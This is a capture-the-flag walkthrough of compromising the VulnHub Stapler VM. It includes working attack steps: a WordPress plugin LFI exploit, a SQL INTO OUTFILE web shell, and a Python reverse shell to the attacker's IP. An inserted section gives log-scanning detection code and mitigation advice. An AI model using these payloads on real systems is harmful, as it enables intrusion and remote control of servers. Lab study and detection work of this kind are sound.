Stapler VM – Walkthrough

Hi Friends,

Today we will see how to crack Stapler, a vulnerable machine that is available on VulnHub.

I will start by discovering the IP of the vulnerable machine, using netdiscover:

netdiscover -r 192.168.10.1/24

I found that Stapler is running on IP 192.168.10.10.

Information Gathering:

I used Nmap, Nikto and WPScan.

nmap -sS -A -p- 192.168.10.10

Found Port 21 – FTP is open and Anonymous login is allowed

Port 80 is open; I tried opening http://192.168.10.10 in the browser and got nothing.

So I tried FTP with anonymous login, with username Anonymous and password Anonymous.

Logged in successfully and found a file called note.

Download the note:

ftp> get note

Checked the nmap result once again for open ports and found that port 12380 is open and an Apache service is running.

Now run the Nikto scanner on 192.168.10.10:12380.

Found useful information such as:

  • The host has SSL enabled, which means it is running on https
  • /admin112233/
  • /blogblog/

Tried to access https://192.168.10.10:12380/admin112233/, ohhh

Tried to access https://192.168.10.10:12380/blogblog/,

It is a blog. I looked at the page's view-source and found it is running on WordPress.

So I ran the WordPress scanner, i.e., wpscan, on the URL:

wpscan --url https://192.168.10.10:12380/blogblog/ --enumerate uap --disable-tls-checks

Found that directory listing is available for the plugins folder.

Found the advanced-video-embed plugin, searched exploit-db.com for an exploit, and found the LFI exploit https://www.exploit-db.com/exploits/39646/

This exploit retrieves the WordPress configuration file, i.e., wp-config.php.

I ran the exploit after updating the URL, but it threw errors, so I updated some of the Python code, adding:

import ssl

ssl._create_default_https_context = ssl._create_unverified_context

Now the exploit ran successfully; browse https://192.168.10.10:12380/blogblog/wp-content/uploads/

We can see a jpeg file has been created.

Open the file in text format.

And we got the configuration details.

Now browse to https://192.168.10.10:12380/phpmyadmin/ and enter the username and password.

We got full access to phpMyAdmin. We will upload a shell using SQL:

SELECT "<?php echo shell_exec($_GET['cmd']); ?>" INTO OUTFILE "/var/www/https/blogblog/wp-content/uploads/shell.php"

Browse https://192.168.10.10:12380/blogblog/wp-content/uploads/

Successfully created shell.php; execute commands like ifconfig.

Now it's time to get a shell, thanks to pentestmonkey:

python%20-c%20'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.3",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

I created the URL and browsed it:

https://192.168.10.10:12380/blogblog/wp-content/uploads/cmd.php?c=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.10.3%22,1234));%20os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);

Start netcat in Kali Linux to get the shell.
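
Seen from the defending side, the two web requests above leave a clear trace in the Apache access log. The following is an added example, not part of the original walkthrough: a small Python check that flags PHP served from wp-content/uploads and query parameters that decode to shell commands. The log lines are constructed sample data and the marker list is an assumed heuristic.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Apache "combined" format: host ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
# PHP executed out of the WordPress upload directory is rarely legitimate.
UPLOAD_PHP = re.compile(r"/wp-content/uploads/.*\.php$", re.IGNORECASE)
# Assumed heuristic: substrings typical of a command passed in a query parameter.
CMD_MARKERS = ("python -c", "socket.socket", "os.dup2", "/bin/sh", "ifconfig")

def inspect(line):
    """Return (client, path, reasons) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    parts = urlsplit(target)
    reasons = []
    if UPLOAD_PHP.search(parts.path):
        reasons.append("php-in-uploads")
    # Split on '&' only: the command itself contains ';' and '='.
    for pair in parts.query.split("&"):
        name, _, value = pair.partition("=")
        decoded = unquote_plus(value).lower()  # %20, %27 ... back to clear text
        if any(marker in decoded for marker in CMD_MARKERS):
            reasons.append("command-in-param:" + name)
    if reasons and status == "200":
        reasons.append("served-200")  # the request was answered successfully
    return (client, parts.path, reasons) if reasons else None

def scan(lines):
    """Run inspect() over many log lines and keep only the findings."""
    return [hit for hit in map(inspect, lines) if hit]

# Constructed sample log lines (not taken from the VM).
SAMPLE = [
    '192.168.10.3 - - [10/Jun/2016:10:01:02 +0000] "GET /blogblog/wp-content/uploads/shell.php?cmd=ifconfig HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.10.3 - - [10/Jun/2016:10:03:40 +0000] "GET /blogblog/wp-content/uploads/cmd.php?c=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)%27 HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.168.10.7 - - [10/Jun/2016:10:05:00 +0000] "GET /blogblog/wp-content/uploads/2016/06/photo.jpeg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, path, reasons in scan(SAMPLE):
        print(client, path, ",".join(reasons))
```

Any "php-in-uploads" hit is worth investigating by itself; denying PHP execution in the uploads directory and restricting MySQL file writes remove the path the walkthrough relies on.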

Privilege Escalation

I am not root on this VM, so I need to do privilege escalation to get root permissions. We know that the VM is running Ubuntu 16.04, so search for an exploit:

https://www.exploit-db.com/exploits/39772/

Got flag.txt 🙂
